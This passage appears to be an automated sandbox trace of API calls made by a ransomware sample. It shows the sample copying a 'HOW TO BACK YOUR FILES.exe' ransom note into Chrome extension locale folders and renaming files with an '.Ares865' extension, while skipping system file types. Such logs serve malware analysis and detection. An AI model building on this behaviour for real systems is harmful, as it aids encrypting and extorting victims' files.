hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=239) returned 1 [0101.066] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da" [0101.067] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da" [0101.067] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.067] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.067] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.068] GetLastError () returned 0x0 [0101.068] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.068] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86a22430, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e3d0c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e3d0c00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.068] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.068] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.068] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.068] lstrlenW (lpString="messages.json") returned 13 [0101.068] lstrlenW (lpString="Ares865") returned 7 [0101.068] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.068] lstrlenW (lpString=".dll") returned 4 [0101.068] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0101.068] lstrlenW (lpString=".lnk") returned 4 [0101.068] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0101.068] lstrlenW (lpString=".ini") returned 4 [0101.068] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0101.068] lstrlenW (lpString=".sys") returned 4 [0101.068] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0101.068] lstrlenW (lpString="messages.json") returned 13 [0101.069] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json.Ares865") returned 160 [0101.069] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.070] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.070] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=236) returned 1 [0101.074] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs" [0101.074] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs" [0101.074] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.074] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.075] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.075] GetLastError () returned 0x0 [0101.075] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.075] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869b0010, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e3d0c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e3d0c00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.075] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.075] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.075] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.075] lstrlenW (lpString="messages.json") returned 13 [0101.075] lstrlenW (lpString="Ares865") returned 7 [0101.075] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.075] lstrlenW (lpString=".dll") returned 4 [0101.075] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0101.075] lstrlenW (lpString=".lnk") returned 4 [0101.076] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0101.076] lstrlenW (lpString=".ini") returned 4 [0101.076] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0101.076] lstrlenW (lpString=".sys") returned 4 [0101.076] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0101.076] lstrlenW (lpString="messages.json") returned 13 [0101.076] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json.Ares865") returned 160 [0101.076] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.077] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.077] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=249) returned 1 [0101.081] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca" [0101.081] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca" [0101.081] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.081] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.082] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.082] GetLastError () returned 0x0 [0101.083] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.083] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869d6170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e3d0c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e3d0c00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.083] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.083] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.083] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.083] lstrlenW (lpString="messages.json") returned 13 [0101.083] lstrlenW (lpString="Ares865") returned 7 [0101.083] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.083] lstrlenW (lpString=".dll") returned 4 [0101.083] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0101.083] lstrlenW (lpString=".lnk") returned 4 [0101.083] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0101.083] lstrlenW (lpString=".ini") returned 4 [0101.083] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0101.083] lstrlenW (lpString=".sys") returned 4 [0101.083] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0101.083] lstrlenW (lpString="messages.json") returned 13 [0101.083] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json.Ares865") returned 160 [0101.083] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.085] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.085] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=254) returned 1 [0101.091] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg" [0101.091] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg" [0101.091] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.091] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.092] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.092] GetLastError () returned 0x0 [0101.092] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.092] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86a22430, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e3d0c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e3d0c00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.093] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.093] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.093] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.093] lstrlenW (lpString="messages.json") returned 13 [0101.093] lstrlenW (lpString="Ares865") returned 7 [0101.093] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.093] lstrlenW (lpString=".dll") returned 4 [0101.093] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0101.093] lstrlenW (lpString=".lnk") returned 4 [0101.093] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0101.093] lstrlenW (lpString=".ini") returned 4 [0101.093] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0101.093] lstrlenW (lpString=".sys") returned 4 [0101.093] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0101.093] lstrlenW (lpString="messages.json") returned 13 [0101.093] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json.Ares865") returned 160 [0101.093] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.094] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.095] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=292) returned 1 [0101.098] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar" [0101.098] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar" [0101.098] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.099] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.099] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.099] GetLastError () returned 0x0 [0101.100] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.100] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86a22430, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e3f6d60, 